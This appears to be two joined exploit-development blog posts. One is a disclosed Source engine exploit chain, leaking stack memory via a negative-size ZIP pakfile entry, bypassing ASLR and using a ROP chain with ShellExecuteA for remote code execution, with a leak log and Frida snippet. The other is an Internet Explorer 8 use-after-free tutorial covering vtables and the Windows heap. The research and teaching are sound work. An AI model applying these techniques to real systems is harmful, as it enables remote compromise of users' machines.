Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:


Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload to the server.

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read contents of the file in 0x100 sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent Anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely as the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:


Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:


This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:


Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{[email protected]
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4) therefore it was easily selectable from the list of DWORDS. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it a label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;

    console.log("[*] Got it!")
    return leakedBase;

The Final Chain + RCE!

After successfully developing the infoleak, now we have both a pointer leak and an arbitrary execute bug. These two are sufficient enough for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

  5. The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll so the pointer sv_download_url->m_pszString is now at an attacker known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.

  9. Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 4. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 7.

  10. Lastly, to execute the ROP chain and achieve RCE, the g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 4. The ROP chain then begins execution. The chain will load necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl given in Step 6. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the users files and data.

And there you have it. This entire exploitation happens automatically, and does so by using Frida to inject into the dedicated server process to instrument to do all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action, be sure to full screen it so it’s easier to see:

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

For the Frida exploit chain:

But sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and its networking protocol it uses is magnitudes more complex than that of Source. There hasn’t been too much research done in the public on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam running creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

21 April 2021 at 00:00


Browser exploitation is a topic that has been incredibly daunting for myself. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember one day just waking up and realizing that I just need to just dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn about it and am still a novice at kernel exploitation, I realized it was my will to just jump in, irrespective of the difficulty level, that helped me to eventually grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel, due to the fact not only do you need to understand overarching exploit primitives and vulnerability classes that are specific to Windows, but also needing to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, which by themselves are difficult (at least to me) to understand. Plus, the addition of browser specific mitigations is also something that has been a determining factor in myself putting off learning this subject.

What has always been frightening, is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for myself. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on and try to ask myself the question “Why did the author feel it was important to mention X concept or show Y snippet of code?”, and to also attempt to answer that question. In addition to that, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. “The author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me to understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them - but it takes that first initial walkthrough for myself.

Since this is my learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now with Advanced Windows Exploitation (AWE) being canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here, is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely for the next few. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

As was aforesaid above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled as Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented, and fairly common. There are great explanations out there, but for brevity and completeness sake I will take a swing at explaining them. Essentially what happens is this - a chunk of memory (chunks are just contiguous pieces of memory, like a buffer. Each piece of memory, known as a block, on x86 systems are 0x8 bytes, or 2 DWORDS. Don’t over-think them) is allocated by the heap manager (on Windows there is the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these in the a future section). At some point during the program’s lifetime, this chunk of memory, which was previously allocated, is “freed”, meaning the allocation is cleaned up and can be re-used by the heap manager again to service allocation requests.

Let’s say the allocation was at the memory address 0x15000. Let’s say the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If we dereferenced the address 0x15000, you could expect to see 0x41s (this is psuedo-speak and should just be taken at a high level for now). When this allocation is freed, if you go back and dereference the address again, you could expect to see invalid memory (e.g. something like ???? in WinDbg), if the address hasn’t been used to service any allocation requests, and is still in a free state.

Where the vulnerability comes in is the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, although in a “free” state. This usually causes a crash, as the program is attempting to either access and/or dereference memory that simply isn’t valid anymore. This usually causes some sort of exception, resulting in a program crash.

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they adhere to C++ nomenclature, such as implementation of classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference is, however, in classes you can define a stricter scope as to where the members of the class can be accessed, with keywords such as private or public. By default, members of classes are private, meaning the members can only be accessed by the class and by inherited classes. We will talk about these concepts in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne

		// This is our user defined constructor
			cout << "Hello from the classOne constructor" << endl;

		// This is our user defined destructor
			cout << "Hello from the classOne destructor!" << endl;

		virtual void sharedFunction(){};				// Prototype a virtual function
		virtual void sharedFunction1(){};				// Prototype a virtual function

// This is a derived/sub class
class classTwo : public classOne

		// This is our user defined constructor
			cout << "Hello from the classTwo constructor!" << endl;

		// This is our user defined destructor
			cout << "Hello from the classTwo destructor!" << endl;

		void sharedFunction() 							
			cout << "Hello from the classTwo sharedFunction()!" << endl;		// Create A DIFFERENT function definition of sharedFunction()

		void sharedFunction1()
			cout << "Hello from the classTwo sharedFunction1()!" << endl;		// Create A DIFFERENT function definition of sharedFunction1()

// This is another derived/sub class
class classThree : public classOne

		// This is our user defined constructor
			cout << "Hello from the classThree constructor" << endl;

		// This is our user defined destructor
			cout << "Hello from the classThree destructor!" << endl;
		void sharedFunction()
			cout << "Hello from the classThree sharedFunction()!" << endl; 	// Create A DIFFERENT definition of sharedFunction()

		void sharedFunction1()
			cout << "Hello from the classThree sharedFunction1()!" << endl; 	// Create A DIFFERENT definition of sharedFunction1()

// Main function
int main()
	// Create an instance of the base/main class and set it to one of the derivative classes
	// Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so it is acceptable to set the address of a classOne object to a classTwo object
	// The class 1 constructor will get called twice (for each classOne object created), and the classTwo + classThree constructors are called once each (total of 4)
	classOne* c1 = new classTwo;
	classOne* c1_2 = new classThree;

	// Invoke the virtual functions

	// Destructors are called when the object is explicitly destroyed with delete
	delete c1;
	delete c1_2;

The above code creates three classes: one “main”, or “base” class (classOne) and then two classes which are “derivative”, or “sub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor is named the same as the class, as is proper nomenclature. So, for instance, a constructor for class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Its general purpose is that they are used so that variables can be initialized within a class, whenever a class object is created. Just like creating an object for a structure, creating a class object is done as such: classOne c1. In our case, we are creating objects that point to a classOne class, which is essentially the same thing, but instead of accessing members directly, we access them via pointers. Essentially, just know that whenever a class object is created (classOne* cl in our case), the constructor is called when creating this object.

In addition to each constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is something that is called whenever the class object, in our case, is about to go out of scope. This could be either code reaching the end of execution or, as is in our case, the delete operator is invoked against one of the previously declared class objects (cl and cl_2). The destructor is the inverse of the constructor - meaning it is called whenever the object is being deleted. Note that a destructor does not have a type, does not accept function arguments, and does not return a value.

In addition to the constructor and destructor, we can see that classOne prototypes two “virtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is “A member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
	int var1;
	int var2;

As you know, the first member of this struct is int var1. The same bodes true with C++ classes. A function that is defined in a class is also a member, hence the term “member function”.

The reason virtual functions exists, is it allows a developer to prototype a function in a main class, but allows for the developer to redefine the function in a derivative class. This works because the derivative class can inherit all of the variables, functions, etc. from its “parent” class. This can be seen in the above code snippet, placed here for brevity: classOne* c1 = new classTwo;. This takes a derivative class of classOne, which is classTwo, and points the classOne object (c1) to the derivative class. It ensures that whenever an object (e.g. c1) calls a function, it is the correctly defined function for that class. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a class object calls the virtual function, the corresponding function definition, appropriate to the class object invoking it, is called.

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an “Empty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically generate a View window with the actual C code, and will walk through the code as you step through it.

In WinDbg, step through the code with t to until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc.

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the “vftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table, and it essentially is a structure of pointers to different virtual functions. Recall earlier how we said “when a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

As we recall from a few images ago, where we dumped the table and saw our two virtual function addresses. We can see that this time program execution is going to invoke this table at an offset of 0x8, which is a pointer to sharedFunction1 instead of sharedFunction this time!

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructor will be called. Since we only created two classOne objects, and we are only deleting those two objects, we know that only the classOne destructor will be called, which is evident by searching for the term “destructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to the UCRTBASED Windows API function _free_dbg, to destroy the object. Note that this would normally be a call to the C Runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
	classOne* c1 = new classTwo;
	classOne* c1_2 = new classThree;


	delete c1;
	delete c1_2;

	// Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configured WinDbg to automatically attach and analyze a program that has just crashed. The above addition of code should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of the Windows SDK known as gflags.exe. glfags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by specifying “patterns” on heap allocations. E.g. if a page is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

Run the .exe again, after adding the code, and WinDbg should fire up.

After enabling PageHeap, let’s run the vulnerable code. (Note you may need to right click the below image and open it in a new tab)

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where you have seen this? This looks to be an attempted function call to a virtual function that does not exist! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case - the class object we are trying to call a virtual function from has already been freed, so we are calling memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourself with the Windows heap, before moving on to the exploitation path.

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr -The best explanation of the LFH, and just heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it coincides with the back-end manager, and much, if not all, of the information provided here, comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, and it should be considered techniques leveraging the heap internals here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass the address as an argument to dt ntdll_HEAP). This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP)structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB. This also means that for each heap, on Windows 7, there are technically only two of these structures - one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, which is a linked-list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which instruments another _HEAP_LIST_LOOKUP structure, based on the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 in size, which is the smallest size possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunks sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints, a linked-list, is indexed to find an appropriately sized free chunk for usage via the back-end manager.

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.

To be brief about the LFH - the LFH is used to service requests that meet the above heuristics requirements, which is 18 consecutive allocations to the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first allocated chunk in the next request. This will prove useful later on. Note that this is no longer the case on more updated systems, and the heap has a greater deal of randomization.

In any event, it is still worth talking about the LFH in its entierty, and especially the heap on Windows. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap manager, let’s talk about usage on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that this explanation of the heap can be more integrally explained by Chris’ paper, and the above explanations are not a comprehensive list, are targeted more towards Windows 7, and are listed simply for brevity and because they are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on the Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to “the trigger code”, which causes a crash.

